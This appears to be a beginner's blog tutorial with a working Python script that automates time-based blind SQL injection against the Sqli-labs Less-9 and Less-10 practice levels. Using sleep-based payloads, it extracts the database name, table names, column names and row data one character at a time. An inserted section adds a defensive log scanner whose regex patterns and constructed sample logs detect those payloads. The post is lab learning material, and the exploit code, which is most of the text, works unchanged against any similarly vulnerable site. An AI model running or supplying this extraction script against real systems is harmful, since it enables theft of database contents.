Test environment: Sqli-labs
Test levels: Less-9, Less-10
Running sqlmap would be quick, but I have only just started learning this area and wanted to try manual injection, which is truly exhausting, so I tried writing a Python script.
I am also a beginner in Python, but as long as it runs, it is fine. Here is the script and the idea behind it, for fellow beginners to look at.
Time-based blind injection needs only two modules: one to read the clock and one to send the HTTP request.

```python
import time
import requests
```
Only two globals are defined: the lab URL (the character after id=1 has to be determined by yourself; Less-9 uses a single quote, Less-10 a double quote) and the set of characters the database name may contain.

```python
url = "http://fwq.c/sqlilabs/Less-9/?id=1'"
words = "abcdefghijklmnopqrstuvwxyz1234567890_-{}, "
```
A function that determines the length of database(), i.e. the length of the database name. Knowing the length cuts the time spent guessing the name; change the argument inside length() to determine the length of other values and shorten the time needed to extract them.

```python
def lent():
    lenth = 0
    for i in range(1, 30):
        # if the guess is correct, the response is delayed by one second
        payload = " and if(length(database())=%d,sleep(1),0) --+" % i
        urls = url + payload
        # print(urls)  # uncomment to check that the payload is written correctly
        start_time = time.time()  # time the request started
        requests.get(urls)
        end_time = time.time()  # time the request finished
        t = end_time - start_time  # elapsed time
        if t >= 1:
            lenth += i
            break  # stop at the first matching length instead of testing the rest
    return lenth
```
A function that determines the name of database(); it takes the return value of the length function and loops over each position, trying every candidate character. The body of a time-based blind check looks much the same everywhere.

```python
def database_name(lenth):
    dbn = ''  # db name
    for a in range(1, lenth + 1):
        for b in words:  # the character set defined above
            # the single quotes around %s delimit the candidate character in SQL
            payload = " and if(substr(database(),%d,1)='%s',sleep(1),0) --+" % (a, b)
            urls = url + payload
            # print(urls)
            starttime = time.time()
            requests.get(urls)
            endtime = time.time()
            t = endtime - starttime
            if t >= 1:
                dbn += b
                break  # character found, move on to the next position
    return dbn
```
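The script above works because each injected condition either delays the response by a second or does not, so from the defender's side the technique leaves a very recognisable trail: a delay primitive inside a conditional, one request per candidate character, and response times that jump to the sleep duration whenever a guess is right. The following is an added example (not part of the original post, and not code from Sqli-labs) that scans access-log lines for exactly those indicators. The log lines, the field layout (Apache combined format with the response time in microseconds appended) and the 900 ms "slow" threshold are all constructed assumptions for the example.

```python
import re
import urllib.parse
from dataclasses import dataclass

# Constructed sample log lines (not from any real server): combined log format with
# the response time in microseconds appended as the last field.
SAMPLE_LOG = """\
10.0.0.5 - - [12/Mar/2024:10:00:01 +0000] "GET /sqlilabs/Less-9/?id=1 HTTP/1.1" 200 812 3200
10.0.0.5 - - [12/Mar/2024:10:00:02 +0000] "GET /sqlilabs/Less-9/?id=1%27%20and%20if(length(database())%3D8%2Csleep(1)%2C0)%20--%2B HTTP/1.1" 200 812 1004321
10.0.0.5 - - [12/Mar/2024:10:00:04 +0000] "GET /sqlilabs/Less-9/?id=1%27%20and%20if(substr(database()%2C1%2C1)%3D%27s%27%2Csleep(1)%2C0)%20--%2B HTTP/1.1" 200 812 1003880
10.0.0.7 - - [12/Mar/2024:10:00:05 +0000] "GET /sqlilabs/Less-9/?id=2 HTTP/1.1" 200 805 2900
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d+) (?P<bytes>\d+) (?P<us>\d+)$'
)

# Indicators of the time-based technique: a delay primitive wrapped in a conditional,
# plus character-by-character enumeration of schema metadata.
SIGNATURES = [
    ("sleep", re.compile(r"\bsleep\s*\(", re.I)),
    ("benchmark", re.compile(r"\bbenchmark\s*\(", re.I)),
    ("cond", re.compile(r"\bif\s*\(", re.I)),
    ("substr", re.compile(r"\b(substr|substring|mid)\s*\(", re.I)),
    ("schema", re.compile(r"\b(database|information_schema|group_concat)\b", re.I)),
]


@dataclass
class Finding:
    ip: str
    param: str
    indicators: list
    response_ms: float


def decode_params(target):
    """Return the URL-decoded query parameters of a request target."""
    query = urllib.parse.urlsplit(target).query
    return urllib.parse.parse_qs(query, keep_blank_values=True)


def scan_line(line, slow_ms=900.0):
    """Return a Finding if the request carries a delay primitive, else None.

    A slow response is recorded as corroboration: it is what a correct guess
    produces, but on its own it is not treated as evidence (latency varies).
    """
    m = LOG_RE.match(line)
    if not m:
        return None
    response_ms = int(m.group("us")) / 1000.0
    for name, values in decode_params(m.group("target")).items():
        for v in values:
            hits = [tag for tag, rx in SIGNATURES if rx.search(v)]
            if "sleep" in hits or "benchmark" in hits:
                if response_ms >= slow_ms:
                    hits.append("slow_response")
                return Finding(m.group("ip"), name, hits, response_ms)
    return None


def scan_log(text, slow_ms=900.0):
    """Scan every line of a log and return the list of findings."""
    return [f for f in (scan_line(l, slow_ms) for l in text.splitlines()) if f]


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f.ip} param={f.param} {f.response_ms:.0f}ms {','.join(f.indicators)}")
```

The decoding step matters: the script on this page sends `--+`, `%27` and `%2C` in the raw URL, so matching on the encoded line would miss half the indicators. Grouping findings by client address and counting them per minute is the natural next step, since one extracted character costs the attacker dozens of requests.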
The payload for the table names; apart from a few variable names, the rest is the same as above. Here the length is redefined and entered by the user, which makes querying and debugging more flexible; of course, determining the length of the table-name list first and then running the time-based check is best.

```python
def table_name(dbn, user_len):
    tbn = ''
    for a in range(1, user_len + 1):  # user_len is entered by the user
        for b in words:
            payload = " and if(substr((select group_concat(table_name) from information_schema.tables where table_schema='%s'),%d,1)='%s',sleep(1),0) --+" % (dbn, a, b)
            # the rest of the loop body is identical to database_name()
            start_time = time.time()
            requests.get(url + payload)
            if time.time() - start_time >= 1:
                tbn += b
                break
    return tbn
```
The payload for the column names:

```python
def column_name(tbn, user_len):
    con = ''
    for a in range(1, user_len + 1):
        for b in words:
            payload = " and if(substr((select group_concat(column_name) from information_schema.columns where table_name='%s'),%d,1)='%s',sleep(1),0) --+" % (tbn, a, b)
            # the rest of the loop body is identical to database_name()
            start_time = time.time()
            requests.get(url + payload)
            if time.time() - start_time >= 1:
                con += b
                break
    return con
```
The payload for the data itself:

```python
def column_data(con, tbn, user_len):
    codata = ''
    for a in range(1, user_len + 1):
        for b in words:
            payload = " and if(substr((select group_concat(%s) from %s),%d,1)='%s',sleep(1),0) --+" % (con, tbn, a, b)
            # the rest of the loop body is identical to database_name()
            start_time = time.time()
            requests.get(url + payload)
            if time.time() - start_time >= 1:
                codata += b
                break
    return codata
```
Main function:

```python
if __name__ == '__main__':
    lenth = lent()  # get the length of database()
    print("it is start")
    dbn = database_name(lenth)  # database name is stored in dbn
    print('database name is:' + dbn)  # print the name
    print('do you want to change default length? y/n (default is 40)')
    time_chose = input()  # whether to use a custom query length
    if time_chose == 'y' or time_chose == 'Y':
        user_len = int(input('len:'))  # enter the length
    else:
        user_len = 40  # default query length is 40
    print("it is start")
    tbn = table_name(dbn, user_len)  # table names are stored in tbn
    print('tables name is:' + tbn)
    print('which table you want to search?')
    tbn = input('table:')  # choose a table
    while tbn != 'quit':  # entering quit leaves the table selection
        print('do you want to change default length? y/n (default is 40)')
        time_chose = input('y/n')
        if time_chose == 'y' or time_chose == 'Y':
            user_len = int(input('len:'))
        else:
            user_len = 40
        print("it is start")
        con = column_name(tbn, user_len)  # column names are stored in con
        print('column_name is :' + con)
        print("if you want to quit please insert 'quit'")
        tbn = input('table:')
    print('which column you want to search?')
    con = input('column:')
    print('which table you want to search?')
    tbn = input('table:')
    while tbn != 'quit' and con != 'quit':  # leave the query if table or column is quit
        print('do you want to change default length?(default is 40)')
        time_chose = input('y/n:')
        if time_chose == 'y' or time_chose == 'Y':
            user_len = int(input('len:'))  # custom length
        else:
            user_len = 40
        print("it is start")
        codata = column_data(con, tbn, user_len)
        print('column_data is :' + codata)
        print("if you want to quit please insert 'quit', and which column you want to search")
        con = input('column:')
        if con == 'quit':
            break
        else:
            print('table of course')
            tbn = input('table:')
```
The code is not very polished; after all, I am still a beginner. Queries take a long time and require patience, and using sqlmap directly is still more convenient. I only wrote this script on a whim to try it out, and the script merely runs.